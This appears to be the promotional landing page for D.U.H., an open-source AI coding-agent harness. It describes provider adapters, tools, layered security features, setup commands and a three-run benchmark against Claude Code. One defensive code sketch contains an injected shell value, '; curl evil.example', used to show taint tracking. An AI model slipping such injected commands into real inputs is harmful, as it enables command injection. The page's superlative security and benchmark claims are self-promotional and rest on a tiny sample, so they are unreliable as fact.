____        _   _       _   _
|  _ \   _  | | | |  _  | | | |
| | | | (_) | | | | (_) | |_| |
| | | |     | | | |     |  _  |
| |_| |  _  | |_| |  _  | | | |
|____/  (_)  \___/  (_) |_| |_|

D.U.H. is a Universal Harness

Open Source · Apache 2.0 · Production Alpha

The Universal AI Coding Agent

One harness. Any model. Your machine.

$ pip install duh-cli
4160 tests passing · 100% coverage · 5 providers · 26 built-in tools · 3-layer security · 54 ADRs · Python 3.12+ · Apache 2.0

Everything you need.
Nothing you don't.

D.U.H. is designed around a clean hexagonal kernel: providers plug in at the edge, tools compose in the middle, and security wraps every layer.

🔌

Provider Freedom

Anthropic Claude, OpenAI API, ChatGPT Plus/Pro (Codex via OAuth), local Ollama, or a deterministic stub for CI. Switch providers at runtime: same harness, any model.

anthropic openai ollama litellm
🛡️

Security-First by Design

3-layer pluggable security: 13 vulnerability scanners, taint-propagating UntrustedStr, HMAC-bound confirmation tokens, lethal trifecta check, macOS Seatbelt + Linux Landlock sandboxing.

taint propagation sandboxing SARIF
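
To make the taint-propagation idea concrete, here is a minimal sketch of a string subclass that carries an origin tag through a few operations. It is an illustration only, not D.U.H.'s actual UntrustedStr: the `origin` attribute, the `is_tainted` helper, and the short list of wrapped methods are assumptions. A real implementation would have to cover every string operation (formatting, joining, slicing, and so on).

```python
class UntrustedStr(str):
    """Illustrative str subclass that remembers where its content came from."""

    def __new__(cls, value, origin="unknown"):
        obj = super().__new__(cls, value)
        obj.origin = origin  # hypothetical attribute name
        return obj

    def __add__(self, other):
        # tainted + anything -> tainted (keeps the left operand's origin)
        if not isinstance(other, str):
            return NotImplemented
        return UntrustedStr(str.__add__(self, other), self.origin)

    def __radd__(self, other):
        # plain + tainted -> tainted
        if not isinstance(other, str):
            return NotImplemented
        return UntrustedStr(str.__add__(other, self), self.origin)


def _propagate(name):
    """Wrap a plain str method so its result keeps the origin tag."""
    plain = getattr(str, name)

    def method(self, *args, **kwargs):
        return UntrustedStr(plain(self, *args, **kwargs), self.origin)

    method.__name__ = name
    return method


# Only a handful of methods are wrapped in this sketch.
for _name in ("upper", "lower", "strip", "replace"):
    setattr(UntrustedStr, _name, _propagate(_name))


def is_tainted(value):
    """Hypothetical helper: True if the value carries an origin tag."""
    return isinstance(value, UntrustedStr)


payload = UntrustedStr("; curl evil.example", origin="web_fetch")
command = "ls " + payload
print(is_tainted(command), command.origin)
```

The point of the design is that the tag survives concatenation, so a gate in front of Bash, Write, or Edit can inspect the final string rather than tracking each input separately.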
⚡

28% Faster than Claude Code

45.7s average vs 63.2s for Claude Code on identical tasks with the same model. Direct Python process: no Node.js runtime, no Ink TUI overhead. 100% success rate (3/3) vs 67% (2/3).

benchmark startup
🔧

26 Built-in Tools

Read, Write, Edit, MultiEdit, Bash, Glob, Grep, WebSearch, WebFetch, Task (subagents), Docker, Database, HTTP, GitHub, LSP, TestImpact, MemoryStore, NotebookEdit, and more.

26 tools MCP skills
💻

Rich TUI & REPL

Full Textual TUI, Rich-powered REPL with 21 slash commands including /connect (OAuth), /snapshot, /plan, /pr, /compact. Print mode for CI pipelines. SDK mode via NDJSON.

REPL print mode SDK mode
🔗

Claude Agent SDK Drop-in

Implements the full NDJSON streaming protocol. Drop duh anywhere claude is expected: same interface, any provider behind it. Verified end-to-end.

NDJSON stream-json ADR-021
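
NDJSON is newline-delimited JSON: one complete JSON value per line. A consumer for such a stream can be sketched as below. The event fields in the sample (`type`, `text`) are invented for illustration; the real message schema is whatever the streaming protocol itself defines.

```python
import io
import json
from typing import Any, Iterator, TextIO


def iter_ndjson(stream: TextIO) -> Iterator[Any]:
    """Yield one parsed JSON value per non-empty line of the stream."""
    for line in stream:
        line = line.strip()
        if not line:
            continue  # tolerate blank lines between records
        yield json.loads(line)


# Hypothetical sample stream; field names are assumptions, not the real schema.
sample = io.StringIO(
    '{"type": "start"}\n'
    '\n'
    '{"type": "message", "text": "hello"}\n'
    '{"type": "end"}\n'
)

events = list(iter_ndjson(sample))
for event in events:
    print(event["type"])
```

In practice the stream would be the standard output of a subprocess rather than an in-memory buffer, read line by line as events arrive.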

Numbers don't lie.

3 independent runs per tool, same model (Claude Haiku 4.5), same prompt, same task (FastAPI URL shortener from spec), fully isolated directories.

Faster average execution: 28%
D.U.H. avg completion time: 45.7s
Claude Code avg time: 63.2s
D.U.H. success rate (3/3): 100%
Claude Code success rate (2/3): 67%
Avg tests generated (D.U.H.): 18
Avg tests generated (CC): 10.5
Avg lines of code (D.U.H.): 419

| Metric | D.U.H. (n=3) | Claude Code (n=2 successful) |
|---|---|---|
| Avg completion time | 45.7s | 63.2s |
| Success rate | 3/3 (100%) | 2/3 (67%) |
| Avg LOC generated | 419 | 273 |
| Avg tests generated | 18 | 10.5 |
| All tests pass (on success) | 3/3 ✓ | 2/2 ✓ |
| Self-correction behavior | Yes (detected & fixed Pydantic issue) | Minimal |
| Runtime / startup | Python (direct) | Node.js + Ink TUI |

ℹ

Methodology: Same Anthropic API key, same model (Haiku 4.5), same prompt verbatim, same TASK.md, separate directories, fresh git repo per run, --max-turns 15 on both tools. D.U.H.'s advantage is architectural simplicity: less startup overhead means more time for actual model interaction. See full benchmark report.
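
The headline figures follow directly from the two reported averages. A small sketch of the arithmetic, using only the numbers above (variable and function names are illustrative):

```python
def percent_less_time(fast_s: float, slow_s: float) -> float:
    """Relative reduction in completion time, as a percentage of the slower run."""
    return (slow_s - fast_s) / slow_s * 100


duh_avg_s = 45.7  # D.U.H. average completion time
cc_avg_s = 63.2   # Claude Code average completion time

reduction_pct = percent_less_time(duh_avg_s, cc_avg_s)
speed_ratio = cc_avg_s / duh_avg_s

duh_success_pct = 3 / 3 * 100
cc_success_pct = 2 / 3 * 100

print(f"time reduction: {reduction_pct:.1f}%")
print(f"speed ratio:    {speed_ratio:.2f}x")
print(f"success rates:  {duh_success_pct:.0f}% vs {cc_success_pct:.0f}%")
```

So "28% faster" here means roughly 27.7% less wall-clock time per task, which is the same as completing tasks at about 1.38 times the rate.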

The deepest security story in open-source AI agents.

Three independent layers that address every published agent RCE in the 2024–2026 CVE corpus. No other open-source AI coding agent comes close.

Layer 1 Vulnerability Monitoring

  • 13 scanners across 3 tiers (Minimal / Extended / Paranoid)
  • Project-file RCE scanner (CVE-2025-59536)
  • MCP tool-poisoning scanner (CVE-2025-54136)
  • Sandbox bypass scanner (CVE-2025-59532)
  • Command injection scanner (CVE-2026-35022)
  • OAuth hardening scanner
  • SARIF output for GitHub Code Scanning
  • Pre-push git hook installer
  • duh security scan · duh security init
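
For readers unfamiliar with SARIF, the sketch below shows the general shape of a SARIF 2.1.0 log that GitHub Code Scanning can ingest. It is not the output of `duh security scan`: the tool name, rule ID, and the structure of the `findings` input are all placeholders chosen for illustration.

```python
import json


def to_sarif(findings, tool_name="example-scanner"):
    """Build a minimal SARIF 2.1.0 log from a list of finding dicts.

    Each finding is assumed (for this sketch) to have the keys
    rule_id, message, path, line, and optionally level.
    """
    rule_ids = sorted({f["rule_id"] for f in findings})
    results = [
        {
            "ruleId": f["rule_id"],
            "level": f.get("level", "warning"),
            "message": {"text": f["message"]},
            "locations": [
                {
                    "physicalLocation": {
                        "artifactLocation": {"uri": f["path"]},
                        "region": {"startLine": f["line"]},
                    }
                }
            ],
        }
        for f in findings
    ]
    return {
        "version": "2.1.0",
        "runs": [
            {
                "tool": {
                    "driver": {
                        "name": tool_name,
                        "rules": [{"id": rid} for rid in rule_ids],
                    }
                },
                "results": results,
            }
        ],
    }


# Hypothetical finding; the rule ID and path are made up.
sarif_log = to_sarif(
    [
        {
            "rule_id": "EXAMPLE-001",
            "message": "Shell command built from untrusted input",
            "path": "src/app.py",
            "line": 42,
            "level": "error",
        }
    ]
)
print(json.dumps(sarif_log, indent=2))
```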

Layer 2 Runtime Hardening

  • Taint propagation: UntrustedStr tags every string by origin and propagates the tag through all string ops
  • Confirmation tokens: HMAC-bound; they prevent tainted strings from reaching Bash/Write/Edit without user confirmation
  • Lethal trifecta check: blocks sessions with simultaneous read-private + read-untrusted + network-egress
  • MCP Unicode normalization (GlassWorm defense)
  • Per-hook filesystem namespacing
  • PEP 578 audit hook bridge (sub-500ns)
  • Signed plugin manifests (TOFU + sigstore-ready)
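
Two of the ideas in this layer are easy to sketch with the standard library. The first part below binds a confirmation token to one specific tool call using HMAC, so a token approved for one command cannot be replayed for another. The second part is a plain set check for the lethal trifecta. Function names, the key handling, and the message layout are assumptions made for this sketch; only the capability names come from the list above.

```python
import hashlib
import hmac
import secrets

# Hypothetical per-session secret; a real system would manage this differently.
SESSION_KEY = secrets.token_bytes(32)


def issue_token(tool: str, argument: str, key: bytes = SESSION_KEY) -> str:
    """Return an HMAC-SHA256 tag bound to this exact tool and argument."""
    message = f"{tool}\x00{argument}".encode("utf-8")
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_token(token: str, tool: str, argument: str, key: bytes = SESSION_KEY) -> bool:
    """Constant-time check that the token matches this tool call."""
    return hmac.compare_digest(token, issue_token(tool, argument, key))


TRIFECTA = frozenset({"read-private", "read-untrusted", "network-egress"})


def violates_trifecta(capabilities) -> bool:
    """True only when all three risky capabilities are active at once."""
    return TRIFECTA <= set(capabilities)


approved = issue_token("Bash", "ls -la")
print(verify_token(approved, "Bash", "ls -la"))    # same call: accepted
print(verify_token(approved, "Bash", "rm -rf /"))  # different argument: rejected
print(violates_trifecta({"read-private", "network-egress"}))
```

Because the tag covers both the tool name and the argument, changing either one after the user confirms invalidates the token.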

Layer 3 OS Sandboxing

  • macOS Seatbelt: sandbox-exec profiles for shell commands and MCP servers
  • Linux Landlock: syscall-level filesystem access control
  • Network policy layer โ€” blocks outbound traffic unless explicitly allowed
  • Approval modes: suggest / auto-edit / full-auto
  • MCP subprocess sandboxing via host OS facilities
  • Provider differential fuzzer (Hypothesis property tests)
Deep dive into security →

Any model. Zero lock-in.

D.U.H.'s kernel never imports a provider directly. Providers are adapters at the edge: swap them without touching your workflow.

🔮

Anthropic Claude

API key or /connect

🤖

OpenAI API

GPT-4o, o1, o3

💬

ChatGPT / Codex

PKCE OAuth, no API key

🦙

Ollama

Local, any pulled model

🧪

Stub Provider

Deterministic CI testing

🌐

litellm / OpenRouter

100+ models via proxy
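
The adapter idea can be sketched in a few lines: the kernel depends only on an interface, and each provider is a class that satisfies it. Everything below is hypothetical (the `Provider` protocol, `complete` method, `Kernel` class, and both adapters) and is meant to show the pattern, not D.U.H.'s real classes.

```python
from typing import Protocol


class Provider(Protocol):
    """The port: the only thing the kernel knows about a model backend."""

    name: str

    def complete(self, prompt: str) -> str: ...


class StubProvider:
    """Deterministic adapter for tests: returns canned replies."""

    name = "stub"

    def __init__(self, canned: dict[str, str]):
        self._canned = dict(canned)

    def complete(self, prompt: str) -> str:
        return self._canned.get(prompt, "")


class EchoProvider:
    """A second toy adapter, standing in for a real model backend."""

    name = "echo"

    def complete(self, prompt: str) -> str:
        return f"echo: {prompt}"


class Kernel:
    """Depends on the Provider protocol, never on a concrete adapter."""

    def __init__(self, provider: Provider):
        self.provider = provider

    def switch(self, provider: Provider) -> None:
        self.provider = provider  # swap backends at runtime

    def run(self, prompt: str) -> str:
        return self.provider.complete(prompt)


kernel = Kernel(StubProvider({"ping": "pong"}))
first = kernel.run("ping")
kernel.switch(EchoProvider())
second = kernel.run("ping")
print(first, "|", second)
```

A deterministic stub like this is what makes CI runs repeatable: the same prompt always yields the same reply, with no network call.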

Up in 60 seconds.

Terminal
# Install
pip install duh-cli

# Set your Anthropic key
export ANTHROPIC_API_KEY=sk-ant-...

# Run a task (print mode, great for scripts)
duh -p "fix the bug in auth.py"

# Interactive REPL
duh

# Use a different model / provider
duh --provider openai --model gpt-4o -p "refactor db.py"

# Local model with Ollama
duh --provider ollama --model qwen2.5-coder -p "write tests"

# Run diagnostics
duh doctor

# Security scan (SARIF output)
duh security scan
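
For scripted use, the print-mode invocation above can be wrapped from Python. The sketch below only assembles the argument list from flags shown in this section (`-p`, `--provider`, `--model`); the helper names are made up, and nothing is assumed about duh's exit codes or output format.

```python
import shutil
import subprocess


def build_duh_command(prompt, provider=None, model=None):
    """Assemble an argv list for a print-mode run, using only documented flags."""
    cmd = ["duh"]
    if provider:
        cmd += ["--provider", provider]
    if model:
        cmd += ["--model", model]
    cmd += ["-p", prompt]
    return cmd


def run_duh(prompt, provider=None, model=None):
    """Run duh if it is installed; return the CompletedProcess, or None if not."""
    if shutil.which("duh") is None:
        return None  # duh-cli is not on PATH
    cmd = build_duh_command(prompt, provider, model)
    return subprocess.run(cmd, capture_output=True, text=True, check=False)


# Building the command has no side effects, so it is safe to print.
print(build_duh_command("refactor db.py", provider="openai", model="gpt-4o"))
```

Passing the prompt as a single list element avoids shell quoting issues, since no shell is involved.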
Full Getting Started Guide →

Built for production alpha.

Tests passing: 4160
Line coverage: 100%
Architecture Decision Records: 54
Built-in tools: 26
Provider adapters: 5
Hook event types: 29
Vulnerability scanners: 13
Test:code ratio: 2.3x